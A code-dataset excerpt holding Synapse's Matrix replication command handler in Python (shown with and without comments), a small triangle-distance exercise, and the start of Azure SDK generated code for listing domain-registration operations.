if hs.config.redis.redis_enabled:
import txredisapi
from synapse.replication.tcp.redis import (
RedisDirectTcpReplicationClientFactory,
)
logger.info(
"Connecting to redis (host=%r port=%r)",
hs.config.redis_host,
hs.config.redis_port,
)
# First let's ensure that we have a ReplicationStreamer started.
hs.get_replication_streamer()
# We need two connections to redis, one for the subscription stream and
# one to send commands to (as you can't send further redis commands to a
# connection after SUBSCRIBE is called).
# First create the connection for sending commands.
outbound_redis_connection = txredisapi.lazyConnection(
host=hs.config.redis_host,
port=hs.config.redis_port,
password=hs.config.redis.redis_password,
reconnect=True,
)
# Now create the factory/connection for the subscription stream.
self._factory = RedisDirectTcpReplicationClientFactory(
hs, outbound_redis_connection
)
hs.get_reactor().connectTCP(
hs.config.redis.redis_host, hs.config.redis.redis_port, self._factory,
)
else:
client_name = hs.get_instance_name()
self._factory = DirectTcpReplicationClientFactory(hs, client_name, self)
host = hs.config.worker_replication_host
port = hs.config.worker_replication_port
hs.get_reactor().connectTCP(host, port, self._factory)
def get_streams(self) -> Dict[str, Stream]:
"""Get a map from stream name to all streams.
"""
return self._streams
def get_streams_to_replicate(self) -> List[Stream]:
"""Get a list of streams that this instances replicates.
"""
return self._streams_to_replicate
def on_REPLICATE(self, conn: AbstractConnection, cmd: ReplicateCommand):
self.send_positions_to_connection(conn)
def send_positions_to_connection(self, conn: AbstractConnection):
"""Send current position of all streams this process is source of to
the connection.
"""
# We respond with current position of all streams this instance
# replicates.
for stream in self.get_streams_to_replicate():
self.send_command(
PositionCommand(
stream.NAME,
self._instance_name,
stream.current_token(self._instance_name),
)
)
def on_USER_SYNC(
self, conn: AbstractConnection, cmd: UserSyncCommand
) -> Optional[Awaitable[None]]:
user_sync_counter.inc()
if self._is_master:
return self._presence_handler.update_external_syncs_row(
cmd.instance_id, cmd.user_id, cmd.is_syncing, cmd.last_sync_ms
)
else:
return None
def on_CLEAR_USER_SYNC(
self, conn: AbstractConnection, cmd: ClearUserSyncsCommand
) -> Optional[Awaitable[None]]:
if self._is_master:
return self._presence_handler.update_external_syncs_clear(cmd.instance_id)
else:
return None
def on_FEDERATION_ACK(self, conn: AbstractConnection, cmd: FederationAckCommand):
federation_ack_counter.inc()
if self._federation_sender:
self._federation_sender.federation_ack(cmd.instance_name, cmd.token)
def on_REMOVE_PUSHER(
self, conn: AbstractConnection, cmd: RemovePusherCommand
) -> Optional[Awaitable[None]]:
remove_pusher_counter.inc()
if self._is_master:
return self._handle_remove_pusher(cmd)
else:
return None
async def _handle_remove_pusher(self, cmd: RemovePusherCommand):
await self._store.delete_pusher_by_app_id_pushkey_user_id(
app_id=cmd.app_id, pushkey=cmd.push_key, user_id=cmd.user_id
)
self._notifier.on_new_replication_data()
def on_USER_IP(
self, conn: AbstractConnection, cmd: UserIpCommand
) -> Optional[Awaitable[None]]:
user_ip_cache_counter.inc()
if self._is_master:
return self._handle_user_ip(cmd)
else:
return None
async def _handle_user_ip(self, cmd: UserIpCommand):
await self._store.insert_client_ip(
cmd.user_id,
cmd.access_token,
cmd.ip,
cmd.user_agent,
cmd.device_id,
cmd.last_seen,
)
assert self._server_notices_sender is not None
await self._server_notices_sender.on_user_ip(cmd.user_id)
def on_RDATA(self, conn: AbstractConnection, cmd: RdataCommand):
if cmd.instance_name == self._instance_name:
# Ignore RDATA that are just our own echoes
return
stream_name = cmd.stream_name
inbound_rdata_count.labels(stream_name).inc()
# We put the received command into a queue here for two reasons:
# 1. so we don't try and concurrently handle multiple rows for the
# same stream, and
# 2. so we don't race with getting a POSITION command and fetching
# missing RDATA.
self._add_command_to_stream_queue(conn, cmd)
async def _process_rdata(
self, stream_name: str, conn: AbstractConnection, cmd: RdataCommand
) -> None:
"""Process an RDATA command
Called after the command has been popped off the queue of inbound commands
"""
try:
row = STREAMS_MAP[stream_name].parse_row(cmd.row)
except Exception as e:
raise Exception(
"Failed to parse RDATA: %r %r" % (stream_name, cmd.row)
) from e
# make sure that we've processed a POSITION for this stream *on this
# connection*. (A POSITION on another connection is no good, as there
# is no guarantee that we have seen all the intermediate updates.)
sbc = self._streams_by_connection.get(conn)
if not sbc or stream_name not in sbc:
# Let's drop the row for now, on the assumption we'll receive a
# `POSITION` soon and we'll catch up correctly then.
logger.debug(
"Discarding RDATA for unconnected stream %s -> %s",
stream_name,
cmd.token,
)
return
if cmd.token is None:
# I.e. this is part of a batch of updates for this stream (in
# which case batch until we get an update for the stream with a non
# None token).
self._pending_batches.setdefault(stream_name, []).append(row)
return
# Check if this is the last of a batch of updates
rows = self._pending_batches.pop(stream_name, [])
rows.append(row)
stream = self._streams[stream_name]
# Find where we previously streamed up to.
current_token = stream.current_token(cmd.instance_name)
# Discard this data if this token is earlier than the current
# position. Note that streams can be reset (in which case you
# expect an earlier token), but that must be preceded by a
# POSITION command.
if cmd.token <= current_token:
logger.debug(
"Discarding RDATA from stream %s at position %s before previous position %s",
stream_name,
cmd.token,
current_token,
)
else:
await self.on_rdata(stream_name, cmd.instance_name, cmd.token, rows)
async def on_rdata(
self, stream_name: str, instance_name: str, token: int, rows: list
):
"""Called to handle a batch of replication data with a given stream token.
Args:
stream_name: name of the replication stream for this batch of rows
instance_name: the instance that wrote the rows.
token: stream token for this batch of rows
rows: a list of Stream.ROW_TYPE objects as returned by
Stream.parse_row.
"""
logger.debug("Received rdata %s (%s) -> %s", stream_name, instance_name, token)
await self._replication_data_handler.on_rdata(
stream_name, instance_name, token, rows
)
def on_POSITION(self, conn: AbstractConnection, cmd: PositionCommand):
if cmd.instance_name == self._instance_name:
# Ignore POSITION that are just our own echoes
return
logger.info("Handling '%s %s'", cmd.NAME, cmd.to_line())
self._add_command_to_stream_queue(conn, cmd)
async def _process_position(
self, stream_name: str, conn: AbstractConnection, cmd: PositionCommand
) -> None:
"""Process a POSITION command
Called after the command has been popped off the queue of inbound commands
"""
stream = self._streams[stream_name]
# We're about to go and catch up with the stream, so remove from set
# of connected streams.
for streams in self._streams_by_connection.values():
streams.discard(stream_name)
# We clear the pending batches for the stream as the fetching of the
# missing updates below will fetch all rows in the batch.
self._pending_batches.pop(stream_name, [])
# Find where we previously streamed up to.
current_token = stream.current_token(cmd.instance_name)
# If the position token matches our current token then we're up to
# date and there's nothing to do. Otherwise, fetch all updates
# between then and now.
missing_updates = cmd.token != current_token
while missing_updates:
logger.info(
"Fetching replication rows for '%s' between %i and %i",
stream_name,
current_token,
cmd.token,
)
(updates, current_token, missing_updates) = await stream.get_updates_since(
cmd.instance_name, current_token, cmd.token
)
# TODO: add some tests for this
# Some streams return multiple rows with the same stream IDs,
# which need to be processed in batches.
for token, rows in _batch_updates(updates):
await self.on_rdata(
stream_name,
cmd.instance_name,
token,
[stream.parse_row(row) for row in rows],
)
logger.info("Caught up with stream '%s' to %i", stream_name, cmd.token)
# We've now caught up to position sent to us, notify handler.
await self._replication_data_handler.on_position(
cmd.stream_name, cmd.instance_name, cmd.token
)
self._streams_by_connection.setdefault(conn, set()).add(stream_name)
def on_REMOTE_SERVER_UP(self, conn: AbstractConnection, cmd: RemoteServerUpCommand):
""""Called when get a new REMOTE_SERVER_UP command."""
self._replication_data_handler.on_remote_server_up(cmd.data)
self._notifier.notify_remote_server_up(cmd.data)
# We relay to all other connections to ensure every instance gets the
# notification.
#
# When configured to use redis we'll always only have one connection and
# so this is a no-op (all instances will have already received the same
# REMOTE_SERVER_UP command).
#
# For direct TCP connections this will relay to all other connections
# connected to us. When on master this will correctly fan out to all
# other direct TCP clients and on workers there'll only be the one
# connection to master.
#
# (The logic here should also be sound if we have a mix of Redis and
# direct TCP connections so long as there is only one traffic route
# between two instances, but that is not currently supported).
self.send_command(cmd, ignore_conn=conn)
def new_connection(self, connection: AbstractConnection):
"""Called when we have a new connection.
"""
self._connections.append(connection)
# If we are connected to replication as a client (rather than a server)
# we need to reset the reconnection delay on the client factory (which
# is used to do exponential back off when the connection drops).
#
# Ideally we would reset the delay when we've "fully established" the
# connection (for some definition thereof) to stop us from tightlooping
# on reconnection if something fails after this point and we drop the
# connection. Unfortunately, we don't really have a better definition of
# "fully established" than the connection being established.
if self._factory:
self._factory.resetDelay()
# Tell the other end if we have any users currently syncing.
currently_syncing = (
self._presence_handler.get_currently_syncing_users_for_replication()
)
now = self._clock.time_msec()
for user_id in currently_syncing:
connection.send_command(
UserSyncCommand(self._instance_id, user_id, True, now)
)
def lost_connection(self, connection: AbstractConnection):
"""Called when a connection is closed/lost.
"""
# we no longer need _streams_by_connection for this connection.
streams = self._streams_by_connection.pop(connection, None)
if streams:
logger.info(
"Lost replication connection; streams now disconnected: %s", streams
)
try:
self._connections.remove(connection)
except ValueError:
pass
def connected(self) -> bool:
"""Do we have any replication connections open?
Is used by e.g. `ReplicationStreamer` to no-op if nothing is connected.
"""
return bool(self._connections)
def send_command(
self, cmd: Command, ignore_conn: Optional[AbstractConnection] = None
):
"""Send a command to all connected connections.
Args:
cmd
ignore_conn: If set don't send command to the given connection.
Used when relaying commands from one connection to all others.
"""
if self._connections:
for connection in self._connections:
if connection == ignore_conn:
continue
try:
connection.send_command(cmd)
except Exception:
# We probably want to catch some types of exceptions here
# and log them as warnings (e.g. connection gone), but I
# can't find what those exception types they would be.
logger.exception(
"Failed to write command %s to connection %s",
cmd.NAME,
connection,
)
else:
logger.warning("Dropping command as not connected: %r", cmd.NAME)
def send_federation_ack(self, token: int):
"""Ack data for the federation stream. This allows the master to drop
data stored purely in memory.
"""
self.send_command(FederationAckCommand(self._instance_name, token))
def send_user_sync(
self, instance_id: str, user_id: str, is_syncing: bool, last_sync_ms: int
):
"""Poke the master that a user has started/stopped syncing.
"""
self.send_command(
UserSyncCommand(instance_id, user_id, is_syncing, last_sync_ms)
)
def send_remove_pusher(self, app_id: str, push_key: str, user_id: str):
"""Poke the master to remove a pusher for a user
"""
cmd = RemovePusherCommand(app_id, push_key, user_id)
self.send_command(cmd)
def send_user_ip(
self,
user_id: str,
access_token: str,
ip: str,
user_agent: str,
device_id: str,
last_seen: int,
):
"""Tell the master that the user made a request.
"""
cmd = UserIpCommand(user_id, access_token, ip, user_agent, device_id, last_seen)
self.send_command(cmd)
def send_remote_server_up(self, server: str):
self.send_command(RemoteServerUpCommand(server))
def stream_update(self, stream_name: str, token: str, data: Any):
"""Called when a new update is available to stream to clients.
We need to check if the client is interested in the stream or not
"""
self.send_command(RdataCommand(stream_name, self._instance_name, token, data))
UpdateToken = TypeVar("UpdateToken")
UpdateRow = TypeVar("UpdateRow")
def _batch_updates(
updates: Iterable[Tuple[UpdateToken, UpdateRow]]
) -> Iterator[Tuple[UpdateToken, List[UpdateRow]]]:
"""Collect stream updates with the same token together
Given a series of updates returned by Stream.get_updates_since(), collects
the updates which share the same stream_id together.
For example:
[(1, a), (1, b), (2, c), (3, d), (3, e)]
becomes:
[
(1, [a, b]),
(2, [c]),
(3, [d, e]),
]
"""
update_iter = iter(updates)
first_update = next(update_iter, None)
if first_update is None:
# empty input
return
current_batch_token = first_update[0]
current_batch = [first_update[1]]
for token, row in update_iter:
if token != current_batch_token:
# different token to the previous row: flush the previous
# batch and start anew
yield current_batch_token, current_batch
current_batch_token = token
current_batch = []
current_batch.append(row)
# flush the final batch
yield current_batch_token, current_batch
| 36.814016 | 93 | 0.633145 |
import logging
from typing import (
Any,
Awaitable,
Dict,
Iterable,
Iterator,
List,
Optional,
Set,
Tuple,
TypeVar,
Union,
)
from prometheus_client import Counter
from typing_extensions import Deque
from twisted.internet.protocol import ReconnectingClientFactory
from synapse.metrics import LaterGauge
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.tcp.client import DirectTcpReplicationClientFactory
from synapse.replication.tcp.commands import (
ClearUserSyncsCommand,
Command,
FederationAckCommand,
PositionCommand,
RdataCommand,
RemoteServerUpCommand,
RemovePusherCommand,
ReplicateCommand,
UserIpCommand,
UserSyncCommand,
)
from synapse.replication.tcp.protocol import AbstractConnection
from synapse.replication.tcp.streams import (
STREAMS_MAP,
BackfillStream,
CachesStream,
EventsStream,
FederationStream,
Stream,
TypingStream,
)
logger = logging.getLogger(__name__)
inbound_rdata_count = Counter(
"synapse_replication_tcp_protocol_inbound_rdata_count", "", ["stream_name"]
)
user_sync_counter = Counter("synapse_replication_tcp_resource_user_sync", "")
federation_ack_counter = Counter("synapse_replication_tcp_resource_federation_ack", "")
remove_pusher_counter = Counter("synapse_replication_tcp_resource_remove_pusher", "")
user_ip_cache_counter = Counter("synapse_replication_tcp_resource_user_ip_cache", "")
_StreamCommandQueue = Deque[
Tuple[Union[RdataCommand, PositionCommand], AbstractConnection]
]
class ReplicationCommandHandler:
def __init__(self, hs):
self._replication_data_handler = hs.get_replication_data_handler()
self._presence_handler = hs.get_presence_handler()
self._store = hs.get_datastore()
self._notifier = hs.get_notifier()
self._clock = hs.get_clock()
self._instance_id = hs.get_instance_id()
self._instance_name = hs.get_instance_name()
self._streams = {
stream.NAME: stream(hs) for stream in STREAMS_MAP.values()
}
self._streams_to_replicate = []
for stream in self._streams.values():
if stream.NAME == CachesStream.NAME:
self._streams_to_replicate.append(stream)
continue
if isinstance(stream, (EventsStream, BackfillStream)):
if hs.config.worker.writers.events == hs.get_instance_name():
self._streams_to_replicate.append(stream)
continue
if isinstance(stream, TypingStream):
if hs.config.worker.writers.typing == hs.get_instance_name():
self._streams_to_replicate.append(stream)
continue
if hs.config.worker_app is not None:
continue
if stream.NAME == FederationStream.NAME and hs.config.send_federation:
# We only support federation stream if federation sending
# has been disabled on the master.
continue
self._streams_to_replicate.append(stream)
# Map of stream name to batched updates. See RdataCommand for info on
# how batching works.
self._pending_batches = {} # type: Dict[str, List[Any]]
# The factory used to create connections.
self._factory = None # type: Optional[ReconnectingClientFactory]
# The currently connected connections. (The list of places we need to send
# outgoing replication commands to.)
self._connections = [] # type: List[AbstractConnection]
LaterGauge(
"synapse_replication_tcp_resource_total_connections",
"",
[],
lambda: len(self._connections),
)
# When POSITION or RDATA commands arrive, we stick them in a queue and process
# them in order in a separate background process.
# the streams which are currently being processed by _unsafe_process_queue
self._processing_streams = set() # type: Set[str]
# for each stream, a queue of commands that are awaiting processing, and the
# connection that they arrived on.
self._command_queues_by_stream = {
stream_name: _StreamCommandQueue() for stream_name in self._streams
}
# For each connection, the incoming stream names that have received a POSITION
# from that connection.
self._streams_by_connection = {} # type: Dict[AbstractConnection, Set[str]]
LaterGauge(
"synapse_replication_tcp_command_queue",
"Number of inbound RDATA/POSITION commands queued for processing",
["stream_name"],
lambda: {
(stream_name,): len(queue)
for stream_name, queue in self._command_queues_by_stream.items()
},
)
self._is_master = hs.config.worker_app is None
self._federation_sender = None
if self._is_master and not hs.config.send_federation:
self._federation_sender = hs.get_federation_sender()
self._server_notices_sender = None
if self._is_master:
self._server_notices_sender = hs.get_server_notices_sender()
def _add_command_to_stream_queue(
self, conn: AbstractConnection, cmd: Union[RdataCommand, PositionCommand]
) -> None:
stream_name = cmd.stream_name
queue = self._command_queues_by_stream.get(stream_name)
if queue is None:
logger.error("Got %s for unknown stream: %s", cmd.NAME, stream_name)
return
queue.append((cmd, conn))
# if we're already processing this stream, there's nothing more to do:
# the new entry on the queue will get picked up in due course
if stream_name in self._processing_streams:
return
# fire off a background process to start processing the queue.
run_as_background_process(
"process-replication-data", self._unsafe_process_queue, stream_name
)
async def _unsafe_process_queue(self, stream_name: str):
assert stream_name not in self._processing_streams
self._processing_streams.add(stream_name)
try:
queue = self._command_queues_by_stream.get(stream_name)
while queue:
cmd, conn = queue.popleft()
try:
await self._process_command(cmd, conn, stream_name)
except Exception:
logger.exception("Failed to handle command %s", cmd)
finally:
self._processing_streams.discard(stream_name)
async def _process_command(
self,
cmd: Union[PositionCommand, RdataCommand],
conn: AbstractConnection,
stream_name: str,
) -> None:
if isinstance(cmd, PositionCommand):
await self._process_position(stream_name, conn, cmd)
elif isinstance(cmd, RdataCommand):
await self._process_rdata(stream_name, conn, cmd)
else:
# This shouldn't be possible
raise Exception("Unrecognised command %s in stream queue", cmd.NAME)
def start_replication(self, hs):
if hs.config.redis.redis_enabled:
import txredisapi
from synapse.replication.tcp.redis import (
RedisDirectTcpReplicationClientFactory,
)
logger.info(
"Connecting to redis (host=%r port=%r)",
hs.config.redis_host,
hs.config.redis_port,
)
hs.get_replication_streamer()
# We need two connections to redis, one for the subscription stream and
# one to send commands to (as you can't send further redis commands to a
outbound_redis_connection = txredisapi.lazyConnection(
host=hs.config.redis_host,
port=hs.config.redis_port,
password=hs.config.redis.redis_password,
reconnect=True,
)
self._factory = RedisDirectTcpReplicationClientFactory(
hs, outbound_redis_connection
)
hs.get_reactor().connectTCP(
hs.config.redis.redis_host, hs.config.redis.redis_port, self._factory,
)
else:
client_name = hs.get_instance_name()
self._factory = DirectTcpReplicationClientFactory(hs, client_name, self)
host = hs.config.worker_replication_host
port = hs.config.worker_replication_port
hs.get_reactor().connectTCP(host, port, self._factory)
def get_streams(self) -> Dict[str, Stream]:
return self._streams
def get_streams_to_replicate(self) -> List[Stream]:
return self._streams_to_replicate
def on_REPLICATE(self, conn: AbstractConnection, cmd: ReplicateCommand):
self.send_positions_to_connection(conn)
def send_positions_to_connection(self, conn: AbstractConnection):
for stream in self.get_streams_to_replicate():
self.send_command(
PositionCommand(
stream.NAME,
self._instance_name,
stream.current_token(self._instance_name),
)
)
def on_USER_SYNC(
self, conn: AbstractConnection, cmd: UserSyncCommand
) -> Optional[Awaitable[None]]:
user_sync_counter.inc()
if self._is_master:
return self._presence_handler.update_external_syncs_row(
cmd.instance_id, cmd.user_id, cmd.is_syncing, cmd.last_sync_ms
)
else:
return None
def on_CLEAR_USER_SYNC(
self, conn: AbstractConnection, cmd: ClearUserSyncsCommand
) -> Optional[Awaitable[None]]:
if self._is_master:
return self._presence_handler.update_external_syncs_clear(cmd.instance_id)
else:
return None
def on_FEDERATION_ACK(self, conn: AbstractConnection, cmd: FederationAckCommand):
federation_ack_counter.inc()
if self._federation_sender:
self._federation_sender.federation_ack(cmd.instance_name, cmd.token)
def on_REMOVE_PUSHER(
self, conn: AbstractConnection, cmd: RemovePusherCommand
) -> Optional[Awaitable[None]]:
remove_pusher_counter.inc()
if self._is_master:
return self._handle_remove_pusher(cmd)
else:
return None
async def _handle_remove_pusher(self, cmd: RemovePusherCommand):
await self._store.delete_pusher_by_app_id_pushkey_user_id(
app_id=cmd.app_id, pushkey=cmd.push_key, user_id=cmd.user_id
)
self._notifier.on_new_replication_data()
def on_USER_IP(
self, conn: AbstractConnection, cmd: UserIpCommand
) -> Optional[Awaitable[None]]:
user_ip_cache_counter.inc()
if self._is_master:
return self._handle_user_ip(cmd)
else:
return None
async def _handle_user_ip(self, cmd: UserIpCommand):
await self._store.insert_client_ip(
cmd.user_id,
cmd.access_token,
cmd.ip,
cmd.user_agent,
cmd.device_id,
cmd.last_seen,
)
assert self._server_notices_sender is not None
await self._server_notices_sender.on_user_ip(cmd.user_id)
def on_RDATA(self, conn: AbstractConnection, cmd: RdataCommand):
if cmd.instance_name == self._instance_name:
return
stream_name = cmd.stream_name
inbound_rdata_count.labels(stream_name).inc()
# same stream, and
# 2. so we don't race with getting a POSITION command and fetching
self._add_command_to_stream_queue(conn, cmd)
async def _process_rdata(
self, stream_name: str, conn: AbstractConnection, cmd: RdataCommand
) -> None:
try:
row = STREAMS_MAP[stream_name].parse_row(cmd.row)
except Exception as e:
raise Exception(
"Failed to parse RDATA: %r %r" % (stream_name, cmd.row)
) from e
# connection*. (A POSITION on another connection is no good, as there
# is no guarantee that we have seen all the intermediate updates.)
sbc = self._streams_by_connection.get(conn)
if not sbc or stream_name not in sbc:
# Let's drop the row for now, on the assumption we'll receive a
# `POSITION` soon and we'll catch up correctly then.
logger.debug(
"Discarding RDATA for unconnected stream %s -> %s",
stream_name,
cmd.token,
)
return
if cmd.token is None:
self._pending_batches.setdefault(stream_name, []).append(row)
return
rows = self._pending_batches.pop(stream_name, [])
rows.append(row)
stream = self._streams[stream_name]
current_token = stream.current_token(cmd.instance_name)
if cmd.token <= current_token:
logger.debug(
"Discarding RDATA from stream %s at position %s before previous position %s",
stream_name,
cmd.token,
current_token,
)
else:
await self.on_rdata(stream_name, cmd.instance_name, cmd.token, rows)
async def on_rdata(
self, stream_name: str, instance_name: str, token: int, rows: list
):
logger.debug("Received rdata %s (%s) -> %s", stream_name, instance_name, token)
await self._replication_data_handler.on_rdata(
stream_name, instance_name, token, rows
)
def on_POSITION(self, conn: AbstractConnection, cmd: PositionCommand):
if cmd.instance_name == self._instance_name:
return
logger.info("Handling '%s %s'", cmd.NAME, cmd.to_line())
self._add_command_to_stream_queue(conn, cmd)
async def _process_position(
self, stream_name: str, conn: AbstractConnection, cmd: PositionCommand
) -> None:
stream = self._streams[stream_name]
# of connected streams.
for streams in self._streams_by_connection.values():
streams.discard(stream_name)
# We clear the pending batches for the stream as the fetching of the
# missing updates below will fetch all rows in the batch.
self._pending_batches.pop(stream_name, [])
# Find where we previously streamed up to.
current_token = stream.current_token(cmd.instance_name)
# If the position token matches our current token then we're up to
# between then and now.
missing_updates = cmd.token != current_token
while missing_updates:
logger.info(
"Fetching replication rows for '%s' between %i and %i",
stream_name,
current_token,
cmd.token,
)
(updates, current_token, missing_updates) = await stream.get_updates_since(
cmd.instance_name, current_token, cmd.token
)
# TODO: add some tests for this
# Some streams return multiple rows with the same stream IDs,
# which need to be processed in batches.
for token, rows in _batch_updates(updates):
await self.on_rdata(
stream_name,
cmd.instance_name,
token,
[stream.parse_row(row) for row in rows],
)
logger.info("Caught up with stream '%s' to %i", stream_name, cmd.token)
# We've now caught up to position sent to us, notify handler.
await self._replication_data_handler.on_position(
cmd.stream_name, cmd.instance_name, cmd.token
)
self._streams_by_connection.setdefault(conn, set()).add(stream_name)
def on_REMOTE_SERVER_UP(self, conn: AbstractConnection, cmd: RemoteServerUpCommand):
self._replication_data_handler.on_remote_server_up(cmd.data)
self._notifier.notify_remote_server_up(cmd.data)
# so this is a no-op (all instances will have already received the same
# REMOTE_SERVER_UP command).
#
# For direct TCP connections this will relay to all other connections
# connected to us. When on master this will correctly fan out to all
# other direct TCP clients and on workers there'll only be the one
self.send_command(cmd, ignore_conn=conn)
def new_connection(self, connection: AbstractConnection):
self._connections.append(connection)
# connection (for some definition thereof) to stop us from tightlooping
# on reconnection if something fails after this point and we drop the
# connection. Unfortunately, we don't really have a better definition of
if self._factory:
self._factory.resetDelay()
currently_syncing = (
self._presence_handler.get_currently_syncing_users_for_replication()
)
now = self._clock.time_msec()
for user_id in currently_syncing:
connection.send_command(
UserSyncCommand(self._instance_id, user_id, True, now)
)
def lost_connection(self, connection: AbstractConnection):
streams = self._streams_by_connection.pop(connection, None)
if streams:
logger.info(
"Lost replication connection; streams now disconnected: %s", streams
)
try:
self._connections.remove(connection)
except ValueError:
pass
def connected(self) -> bool:
return bool(self._connections)
def send_command(
self, cmd: Command, ignore_conn: Optional[AbstractConnection] = None
):
if self._connections:
for connection in self._connections:
if connection == ignore_conn:
continue
try:
connection.send_command(cmd)
except Exception:
logger.exception(
"Failed to write command %s to connection %s",
cmd.NAME,
connection,
)
else:
logger.warning("Dropping command as not connected: %r", cmd.NAME)
def send_federation_ack(self, token: int):
self.send_command(FederationAckCommand(self._instance_name, token))
def send_user_sync(
self, instance_id: str, user_id: str, is_syncing: bool, last_sync_ms: int
):
self.send_command(
UserSyncCommand(instance_id, user_id, is_syncing, last_sync_ms)
)
def send_remove_pusher(self, app_id: str, push_key: str, user_id: str):
cmd = RemovePusherCommand(app_id, push_key, user_id)
self.send_command(cmd)
def send_user_ip(
self,
user_id: str,
access_token: str,
ip: str,
user_agent: str,
device_id: str,
last_seen: int,
):
cmd = UserIpCommand(user_id, access_token, ip, user_agent, device_id, last_seen)
self.send_command(cmd)
def send_remote_server_up(self, server: str):
self.send_command(RemoteServerUpCommand(server))
def stream_update(self, stream_name: str, token: str, data: Any):
self.send_command(RdataCommand(stream_name, self._instance_name, token, data))
UpdateToken = TypeVar("UpdateToken")
UpdateRow = TypeVar("UpdateRow")
def _batch_updates(
updates: Iterable[Tuple[UpdateToken, UpdateRow]]
) -> Iterator[Tuple[UpdateToken, List[UpdateRow]]]:
update_iter = iter(updates)
first_update = next(update_iter, None)
if first_update is None:
# empty input
return
current_batch_token = first_update[0]
current_batch = [first_update[1]]
for token, row in update_iter:
if token != current_batch_token:
# different token to the previous row: flush the previous
# batch and start anew
yield current_batch_token, current_batch
current_batch_token = token
current_batch = []
current_batch.append(row)
# flush the final batch
yield current_batch_token, current_batch
| true | true |
1c303f70e9a7325250f4f9ef21e32dd6200a33f3 | 545 | py | Python | Courses/YandexAlgo/1/triangle_point.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | Courses/YandexAlgo/1/triangle_point.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | Courses/YandexAlgo/1/triangle_point.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | def dist(x1, y1, x2, y2):
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5
def solve():
d = int(input())
x, y = map(int, input().split())
if (y <= -x + d) and (x >= 0) and (y >= 0):
return 0
else:
a = dist(0, 0, x, y)
b = dist(d, 0, x, y)
c = dist(0, d, x, y)
if a <= b:
if a <= c:
return 1
else:
return 3
else:
if b <= c:
return 2
else:
return 3
print(solve())
| 20.185185 | 51 | 0.33578 | def dist(x1, y1, x2, y2):
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5
def solve():
d = int(input())
x, y = map(int, input().split())
if (y <= -x + d) and (x >= 0) and (y >= 0):
return 0
else:
a = dist(0, 0, x, y)
b = dist(d, 0, x, y)
c = dist(0, d, x, y)
if a <= b:
if a <= c:
return 1
else:
return 3
else:
if b <= c:
return 2
else:
return 3
print(solve())
| true | true |
1c30415163ecfaf1b9ac21056ac2ad3ebdfacf67 | 5,798 | py | Python | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_06_01/operations/_domain_registration_provider_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | 1 | 2021-09-07T18:39:05.000Z | 2021-09-07T18:39:05.000Z | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_06_01/operations/_domain_registration_provider_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | null | null | null | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_06_01/operations/_domain_registration_provider_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | 1 | 2022-03-04T06:21:56.000Z | 2022-03-04T06:21:56.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_operations_request(
**kwargs: Any
) -> HttpRequest:
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/providers/Microsoft.DomainRegistration/operations')
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
class DomainRegistrationProviderOperations(object):
"""DomainRegistrationProviderOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.web.v2020_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list_operations(
self,
**kwargs: Any
) -> Iterable["_models.CsmOperationCollection"]:
"""Implements Csm operations Api to exposes the list of available Csm Apis under the resource
provider.
Description for Implements Csm operations Api to exposes the list of available Csm Apis under
the resource provider.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CsmOperationCollection or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2020_06_01.models.CsmOperationCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CsmOperationCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_operations_request(
template_url=self.list_operations.metadata['url'],
)
request = _convert_request(request)
